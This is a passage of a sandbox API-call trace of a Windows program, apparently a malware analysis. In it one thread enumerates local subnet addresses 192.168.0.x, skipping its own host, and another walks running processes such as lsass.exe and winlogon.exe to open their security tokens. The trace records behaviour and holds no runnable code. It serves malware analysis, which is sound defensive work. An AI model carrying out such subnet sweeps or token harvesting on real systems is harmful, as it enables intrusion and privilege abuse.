param_2="%s.%d" | out: param_1="192.168.0.223") returned 13 [0096.166] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.223") returned 1 [0096.166] malloc (_Size=0x1c) returned 0x20ac818 [0096.166] lstrcpyA (in: lpString1=0x20ac81c, lpString2="192.168.0.223" | out: lpString1="192.168.0.223") returned="192.168.0.223" [0096.166] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac818 | out: ListHead=0x2064bd0, ListEntry=0x20ac818) returned 0x20ac7f0 [0096.166] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.224") returned 13 [0096.167] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.224") returned 1 [0096.167] malloc (_Size=0x1c) returned 0x20ac840 [0096.167] lstrcpyA (in: lpString1=0x20ac844, lpString2="192.168.0.224" | out: lpString1="192.168.0.224") returned="192.168.0.224" [0096.167] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac840 | out: ListHead=0x2064bd0, ListEntry=0x20ac840) returned 0x20ac818 [0096.167] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.225") returned 13 [0096.167] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.225") returned 1 [0096.167] malloc (_Size=0x1c) returned 0x20ac868 [0096.167] lstrcpyA (in: lpString1=0x20ac86c, lpString2="192.168.0.225" | out: lpString1="192.168.0.225") returned="192.168.0.225" [0096.167] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac868 | out: ListHead=0x2064bd0, ListEntry=0x20ac868) returned 0x20ac840 [0096.167] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.226") returned 13 [0096.167] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.226") returned 1 [0096.167] malloc (_Size=0x1c) returned 0x20ac890 [0096.167] lstrcpyA (in: lpString1=0x20ac894, lpString2="192.168.0.226" | out: lpString1="192.168.0.226") returned="192.168.0.226" [0096.167] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac890 | out: ListHead=0x2064bd0, ListEntry=0x20ac890) returned 0x20ac868 [0096.167] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.227") returned 13 [0096.167] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.227") returned 1 [0096.167] malloc (_Size=0x1c) returned 0x20ac8b8 [0096.167] lstrcpyA (in: lpString1=0x20ac8bc, lpString2="192.168.0.227" | out: lpString1="192.168.0.227") returned="192.168.0.227" [0096.167] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac8b8 | out: ListHead=0x2064bd0, ListEntry=0x20ac8b8) returned 0x20ac890 [0096.167] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.228") returned 13 [0096.167] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.228") returned 1 [0096.167] malloc (_Size=0x1c) returned 0x20ac8e0 [0096.167] lstrcpyA (in: lpString1=0x20ac8e4, lpString2="192.168.0.228" | out: lpString1="192.168.0.228") returned="192.168.0.228" [0096.167] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac8e0 | out: ListHead=0x2064bd0, ListEntry=0x20ac8e0) returned 0x20ac8b8 [0096.167] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.229") returned 13 [0096.167] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.229") returned 1 [0096.167] malloc (_Size=0x1c) returned 0x20ac908 [0096.167] lstrcpyA (in: lpString1=0x20ac90c, lpString2="192.168.0.229" | out: lpString1="192.168.0.229") returned="192.168.0.229" [0096.168] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac908 | out: ListHead=0x2064bd0, ListEntry=0x20ac908) returned 0x20ac8e0 [0096.168] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.230") returned 13 [0096.168] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.230") returned 1 [0096.168] malloc (_Size=0x1c) returned 0x20ac930 [0096.168] lstrcpyA (in: lpString1=0x20ac934, lpString2="192.168.0.230" | out: lpString1="192.168.0.230") returned="192.168.0.230" [0096.168] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac930 | out: ListHead=0x2064bd0, ListEntry=0x20ac930) returned 0x20ac908 [0096.168] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.231") returned 13 [0096.168] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.231") returned 1 [0096.168] malloc (_Size=0x1c) returned 0x20ac958 [0096.168] lstrcpyA (in: lpString1=0x20ac95c, lpString2="192.168.0.231" | out: lpString1="192.168.0.231") returned="192.168.0.231" [0096.168] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac958 | out: ListHead=0x2064bd0, ListEntry=0x20ac958) returned 0x20ac930 [0096.168] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.232") returned 13 [0096.168] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.232") returned 1 [0096.168] malloc (_Size=0x1c) returned 0x20ac980 [0096.168] lstrcpyA (in: lpString1=0x20ac984, lpString2="192.168.0.232" | out: lpString1="192.168.0.232") returned="192.168.0.232" [0096.168] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac980 | out: ListHead=0x2064bd0, ListEntry=0x20ac980) returned 0x20ac958 [0096.168] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.233") returned 13 [0096.168] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.233") returned 1 [0096.168] malloc (_Size=0x1c) returned 0x20ac9a8 [0096.168] lstrcpyA (in: lpString1=0x20ac9ac, lpString2="192.168.0.233" | out: lpString1="192.168.0.233") returned="192.168.0.233" [0096.168] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac9a8 | out: ListHead=0x2064bd0, ListEntry=0x20ac9a8) returned 0x20ac980 [0096.168] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.234") returned 13 [0096.168] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.234") returned 1 [0096.168] malloc (_Size=0x1c) returned 0x20ac9d0 [0096.168] lstrcpyA (in: lpString1=0x20ac9d4, lpString2="192.168.0.234" | out: lpString1="192.168.0.234") returned="192.168.0.234" [0096.168] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac9d0 | out: ListHead=0x2064bd0, ListEntry=0x20ac9d0) returned 0x20ac9a8 [0096.168] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.235") returned 13 [0096.168] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.235") returned 1 [0096.169] malloc (_Size=0x1c) returned 0x20ac9f8 [0096.169] lstrcpyA (in: lpString1=0x20ac9fc, lpString2="192.168.0.235" | out: lpString1="192.168.0.235") returned="192.168.0.235" [0096.169] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20ac9f8 | out: ListHead=0x2064bd0, ListEntry=0x20ac9f8) returned 0x20ac9d0 [0096.169] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.236") returned 13 [0096.169] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.236") returned 0 [0096.169] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.237") returned 13 [0096.169] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.237") returned -1 [0096.169] malloc (_Size=0x1c) returned 0x20aca20 [0096.169] lstrcpyA (in: lpString1=0x20aca24, lpString2="192.168.0.237" | out: lpString1="192.168.0.237") returned="192.168.0.237" [0096.169] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20aca20 | out: ListHead=0x2064bd0, ListEntry=0x20aca20) returned 0x20ac9f8 [0096.169] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.238") returned 13 [0096.169] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.238") returned -1 [0096.169] malloc (_Size=0x1c) returned 0x20aca48 [0096.169] lstrcpyA (in: lpString1=0x20aca4c, lpString2="192.168.0.238" | out: lpString1="192.168.0.238") returned="192.168.0.238" [0096.169] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20aca48 | out: ListHead=0x2064bd0, ListEntry=0x20aca48) returned 0x20aca20 [0096.169] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.239") returned 13 [0096.169] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.239") returned -1 [0096.169] malloc (_Size=0x1c) returned 0x20aca70 [0096.169] lstrcpyA (in: lpString1=0x20aca74, lpString2="192.168.0.239" | out: lpString1="192.168.0.239") returned="192.168.0.239" [0096.169] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20aca70 | out: ListHead=0x2064bd0, ListEntry=0x20aca70) returned 0x20aca48 [0096.169] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.240") returned 13 [0096.169] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.240") returned -1 [0096.169] malloc (_Size=0x1c) returned 0x20aca98 [0096.169] lstrcpyA (in: lpString1=0x20aca9c, lpString2="192.168.0.240" | out: lpString1="192.168.0.240") returned="192.168.0.240" [0096.169] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20aca98 | out: ListHead=0x2064bd0, ListEntry=0x20aca98) returned 0x20aca70 [0096.169] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.241") returned 13 [0096.169] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.241") returned -1 [0096.169] malloc (_Size=0x1c) returned 0x20acac0 [0096.170] lstrcpyA (in: lpString1=0x20acac4, lpString2="192.168.0.241" | out: lpString1="192.168.0.241") returned="192.168.0.241" [0096.170] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20acac0 | out: ListHead=0x2064bd0, ListEntry=0x20acac0) returned 0x20aca98 [0096.170] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.242") returned 13 [0096.170] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.242") returned -1 [0096.170] malloc (_Size=0x1c) returned 0x20acae8 [0096.170] lstrcpyA (in: lpString1=0x20acaec, lpString2="192.168.0.242" | out: lpString1="192.168.0.242") returned="192.168.0.242" [0096.170] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20acae8 | out: ListHead=0x2064bd0, ListEntry=0x20acae8) returned 0x20acac0 [0096.170] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.243") returned 13 [0096.170] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.243") returned -1 [0096.170] malloc (_Size=0x1c) returned 0x20acb10 [0096.170] lstrcpyA (in: lpString1=0x20acb14, lpString2="192.168.0.243" | out: lpString1="192.168.0.243") returned="192.168.0.243" [0096.170] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20acb10 | out: ListHead=0x2064bd0, ListEntry=0x20acb10) returned 0x20acae8 [0096.170] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.244") returned 13 [0096.170] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.244") returned -1 [0096.170] malloc (_Size=0x1c) returned 0x20acb38 [0096.170] lstrcpyA (in: lpString1=0x20acb3c, lpString2="192.168.0.244" | out: lpString1="192.168.0.244") returned="192.168.0.244" [0096.170] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20acb38 | out: ListHead=0x2064bd0, ListEntry=0x20acb38) returned 0x20acb10 [0096.170] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.245") returned 13 [0096.170] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.245") returned -1 [0096.170] malloc (_Size=0x1c) returned 0x20acb60 [0096.170] lstrcpyA (in: lpString1=0x20acb64, lpString2="192.168.0.245" | out: lpString1="192.168.0.245") returned="192.168.0.245" [0096.170] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20acb60 | out: ListHead=0x2064bd0, ListEntry=0x20acb60) returned 0x20acb38 [0096.170] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.246") returned 13 [0096.170] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.246") returned -1 [0096.170] malloc (_Size=0x1c) returned 0x20acb88 [0096.170] lstrcpyA (in: lpString1=0x20acb8c, lpString2="192.168.0.246" | out: lpString1="192.168.0.246") returned="192.168.0.246" [0096.170] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20acb88 | out: ListHead=0x2064bd0, ListEntry=0x20acb88) returned 0x20acb60 [0096.170] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.247") returned 13 [0096.171] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.247") returned -1 [0096.171] malloc (_Size=0x1c) returned 0x20acbb0 [0096.171] lstrcpyA (in: lpString1=0x20acbb4, lpString2="192.168.0.247" | out: lpString1="192.168.0.247") returned="192.168.0.247" [0096.171] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20acbb0 | out: ListHead=0x2064bd0, ListEntry=0x20acbb0) returned 0x20acb88 [0096.171] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.248") returned 13 [0096.171] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.248") returned -1 [0096.171] malloc (_Size=0x1c) returned 0x20acbd8 [0096.171] lstrcpyA (in: lpString1=0x20acbdc, lpString2="192.168.0.248" | out: lpString1="192.168.0.248") returned="192.168.0.248" [0096.171] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20acbd8 | out: ListHead=0x2064bd0, ListEntry=0x20acbd8) returned 0x20acbb0 [0096.171] malloc (_Size=0x1c) returned 0x20acc00 [0096.171] lstrcpyA (in: lpString1=0x20acc04, lpString2="192.168.0.249" | out: lpString1="192.168.0.249") returned="192.168.0.249" [0096.171] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x20acc00 | out: ListHead=0x2064bd0, ListEntry=0x20acc00) returned 0x20acbd8 Thread: id = 17 os_tid = 0xfb8 [0072.134] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x330ff48 | out: TokenHandle=0x330ff48*=0x248) returned 1 [0072.134] GetTokenInformation (in: TokenHandle=0x248, TokenInformationClass=0x12, TokenInformation=0x330ff44, TokenInformationLength=0x4, ReturnLength=0x330ff4c | out: TokenInformation=0x330ff44, ReturnLength=0x330ff4c) returned 1 [0072.134] GetTokenInformation (in: TokenHandle=0x248, TokenInformationClass=0x13, TokenInformation=0x330ff44, TokenInformationLength=0x4, ReturnLength=0x330ff4c | out: TokenInformation=0x330ff44, ReturnLength=0x330ff4c) returned 1 [0072.134] GetTokenInformation (in: TokenHandle=0x24c, TokenInformationClass=0xa, TokenInformation=0x330ff50, TokenInformationLength=0x38, ReturnLength=0x330ff4c | out: TokenInformation=0x330ff50, ReturnLength=0x330ff4c) returned 1 [0072.134] CloseHandle (hObject=0x24c) returned 1 [0072.134] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24c [0072.146] Process32FirstW (in: hSnapshot=0x24c, lppe=0x330fcb0 | out: lppe=0x330fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0072.147] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0072.147] Process32NextW (in: hSnapshot=0x24c, lppe=0x330fcb0 | out: lppe=0x330fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0072.148] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x4) returned 0x250 [0072.148] OpenProcessToken (in: ProcessHandle=0x250, DesiredAccess=0xa, TokenHandle=0x330ff2c | out: TokenHandle=0x330ff2c*=0x0) returned 0 [0072.148] CloseHandle (hObject=0x250) returned 1 [0072.148] Process32NextW (in: hSnapshot=0x24c, lppe=0x330fcb0 | out: lppe=0x330fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0072.149] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x104) returned 0x250 [0072.149] OpenProcessToken (in: ProcessHandle=0x250, DesiredAccess=0xa, TokenHandle=0x330ff2c | out: TokenHandle=0x330ff2c*=0x254) returned 1 [0072.149] GetTokenInformation (in: TokenHandle=0x254, TokenInformationClass=0xa, TokenInformation=0x330fee0, TokenInformationLength=0x38, ReturnLength=0x330ff1c | out: TokenInformation=0x330fee0, ReturnLength=0x330ff1c) returned 1 [0072.149] CloseHandle (hObject=0x254) returned 1 [0072.149] CloseHandle (hObject=0x250) returned 1 [0072.150] Process32NextW (in: hSnapshot=0x24c, lppe=0x330fcb0 | out: lppe=0x330fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0072.150] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x148) returned 0x250 [0072.151] OpenProcessToken (in: ProcessHandle=0x250, DesiredAccess=0xa, TokenHandle=0x330ff2c | out: TokenHandle=0x330ff2c*=0x254) returned 1 [0072.151] GetTokenInformation (in: TokenHandle=0x254, TokenInformationClass=0xa, TokenInformation=0x330fee0, TokenInformationLength=0x38, ReturnLength=0x330ff1c | out: TokenInformation=0x330fee0, ReturnLength=0x330ff1c) returned 1 [0072.151] CloseHandle (hObject=0x254) returned 1 [0072.151] CloseHandle (hObject=0x250) returned 1 [0072.151] Process32NextW (in: hSnapshot=0x24c, lppe=0x330fcb0 | out: lppe=0x330fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0072.152] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x16c) returned 0x250 [0072.152] OpenProcessToken (in: ProcessHandle=0x250, DesiredAccess=0xa, TokenHandle=0x330ff2c | out: TokenHandle=0x330ff2c*=0x254) returned 1 [0072.152] GetTokenInformation (in: TokenHandle=0x254, TokenInformationClass=0xa, TokenInformation=0x330fee0, TokenInformationLength=0x38, ReturnLength=0x330ff1c | out: TokenInformation=0x330fee0, ReturnLength=0x330ff1c) returned 1 [0072.152] CloseHandle (hObject=0x254) returned 1 [0072.152] CloseHandle (hObject=0x250) returned 1 [0072.152] Process32NextW (in: hSnapshot=0x24c, lppe=0x330fcb0 | out: lppe=0x330fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x164, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0072.153] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x178) returned 0x250 [0072.153] OpenProcessToken (in: ProcessHandle=0x250, DesiredAccess=0xa, TokenHandle=0x330ff2c | out: TokenHandle=0x330ff2c*=0x254) returned 1 [0072.153] GetTokenInformation (in: TokenHandle=0x254, TokenInformationClass=0xa, TokenInformation=0x330fee0, TokenInformationLength=0x38, ReturnLength=0x330ff1c | out: TokenInformation=0x330fee0, ReturnLength=0x330ff1c) returned 1 [0072.153] CloseHandle (hObject=0x254) returned 1 [0072.153] CloseHandle (hObject=0x250) returned 1 [0072.153] Process32NextW (in: hSnapshot=0x24c, lppe=0x330fcb0 | out: lppe=0x330fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x164, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0072.154] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1a0) returned 0x250 [0072.154] OpenProcessToken (in: ProcessHandle=0x250, DesiredAccess=0xa, TokenHandle=0x330ff2c | out: TokenHandle=0x330ff2c*=0x254) returned 1 [0072.154] GetTokenInformation (in: TokenHandle=0x254, TokenInformationClass=0xa, TokenInformation=0x330fee0, TokenInformationLength=0x38, ReturnLength=0x330ff1c | out: TokenInformation=0x330fee0, ReturnLength=0x330ff1c) returned 1 [0072.154] CloseHandle (hObject=0x254) returned 1 [0072.154] CloseHandle (hObject=0x250) returned 1 [0072.154] Process32NextW (in: hSnapshot=0x24c, lppe=0x330fcb0 | out: lppe=0x330fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x16c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0072.155] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1c4) returned 0x250 [0072.155] OpenProcessToken (in: ProcessHandle=0x250, DesiredAccess=0xa, TokenHandle=0x330ff2c | out: TokenHandle=0x330ff2c*=0x254) returned 1 [0072.155] GetTokenInformation (in: TokenHandle=0x254, TokenInformationClass=0xa, TokenInformation=0x330fee0, TokenInformationLength=0x38, ReturnLength=0x330ff1c | out: TokenInformation=0x330fee0, ReturnLength=0x330ff1c) returned 1 [0072.155] CloseHandle (hObject=0x254) returned 1 [0072.155] CloseHandle (hObject=0x250) returned 1 [0072.155] Process32NextW (in: hSnapshot=0x24c, lppe=0x330fcb0 | out: lppe=0x330fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x16c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0072.156] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1cc) returned 0x250 [0072.156] OpenProcessToken (in: ProcessHandle=0x250, DesiredAccess=0xa, TokenHandle=0x330ff2c | out: TokenHandle=0x330ff2c*=0x254) returned 1 [0072.156] GetTokenInformation (in: TokenHandle=0x254, TokenInformationClass=0xa, TokenInformation=0x330fee0, TokenInformationLength=0x38, ReturnLength=0x330ff1c | out: TokenInformation=0x330fee0, ReturnLength=0x330ff1c) returned 1 [0072.156] CloseHandle (hObject=0x254) returned 1 [0072.156] CloseHandle (hObject=0x250) returned 1 [0072.156] Process32NextW (in: hSnapshot=0x24c, lppe=0x330fcb0 | out: lppe=0x330fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x16c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0072.157] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1d4) returned 0x250 [0072.157] OpenProcessToken (in: ProcessHandle=0x250, DesiredAccess=0xa, TokenHandle=0x330ff2c | out: TokenHandle=0x330ff2c*=0x254) returned 1 [0072.157] GetTokenInformation (in: TokenHandle=0x254, TokenInformationClass=0xa, TokenInformation=0x330fee0, TokenInformationLength=0x38, ReturnLength=0x330ff1c | out: TokenInformation=0x330fee0, ReturnLength=0x330ff1c) returned 1 [0072.157] CloseHandle (hObject=0x254) returned 1 [0072.157] CloseHandle (hObject=0x250) returned 1 [0072.157] Process32NextW (in: hSnapshot=0x24c, lppe=0x330fcb0 | out: lppe=0x330fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.158] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x244) returned 0x250 [0072.158] OpenProcessToken (in: ProcessHandle=0x250, DesiredAccess=0xa, TokenHandle=0x330ff2c | out: TokenHandle=0x330ff2c*=0x0) returned 0 [0072.158] CloseHandle (hObject=0x250) returned 1 [0072.158] Process32NextW (in: hSnapshot=0x24c, lppe=0x330fcb0 | out: lppe=0x330fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.158] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x288) returned 0x250 [0072.159] OpenProcessToken (in: ProcessHandle=0x250, DesiredAccess=0xa, TokenHandle=0x330ff2c | out: TokenHandle=0x330ff2c*=0x0) returned 0 [0072.159] CloseHandle (hObject=0x250) returned 1 [0072.159] Process32NextW (in: hSnapshot=0x24c, lppe=0x330fcb0 | out: lppe=0x330fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.159] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x2bc) returned 0x250 [0072.159] OpenProcessToken (in: ProcessHandle=0x250, DesiredAccess=0xa, TokenHandle=0x330ff2c | out: TokenHandle=0x330ff2c*=0x0) returned 0 [0072.160] CloseHandle (hObject=0x250) returned 1 [0072.160] Process32NextW (in: hSnapshot=0x24c, lppe=0x330fcb0 | out: lppe=0x330fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.160] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x32c) returned 0x250 [0072.160] OpenProcessToken (in: ProcessHandle=0x250, DesiredAccess=0xa, TokenHandle=0x330ff2c | out: TokenHandle=0x330ff2c*=0x254) returned 1 [0072.160] GetTokenInformation (in: TokenHandle=0x254, TokenInformationClass=0xa, TokenInformation=0x330fee0, TokenInformationLength=0x38, ReturnLength=0x330ff1c | out: TokenInformation=0x330fee0, ReturnLength=0x330ff1c) returned 1 [0072.161] CloseHandle (hObject=0x254) returned 1 [0072.161] CloseHandle (hObject=0x250) returned 1 [0072.161] Process32NextW (in: hSnapshot=0x24c, lppe=0x330fcb0 | out: lppe=0x330fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x36, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.161] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x360) returned 0x250 [0072.161] OpenProcessToken (in: ProcessHandle=0x250, DesiredAccess=0xa, TokenHandle=0x330ff2c | out: TokenHandle=0x330ff2c*=0x254) returned 1 [0072.162] GetTokenInformation (in: TokenHandle=0x254, TokenInformationClass=0xa, TokenInformation=0x330fee0, TokenInformationLength=0x38, ReturnLength=0x330ff1c | out: TokenInformation=0x330fee0, ReturnLength=0x330ff1c) returned 1 [0072.162] CloseHandle (hObject=0x254) returned 1 [0072.162] CloseHandle (hObject=0x250) returned 1 [0072.162] Process32NextW (in: hSnapshot=0x24c, lppe=0x330fcb0 | out: lppe=0x330fcb0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0072.162] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x3f0) returned 0x250 [0072.163] OpenProcessToken (in: ProcessHandle=0x250, DesiredAccess=0xa, TokenHandle=0x330ff2c | out: TokenHandle=0x330ff2c*=0x0) returned 0 [0072.163] CloseHandle (hObject=0x250) returned 1 [0072.163] 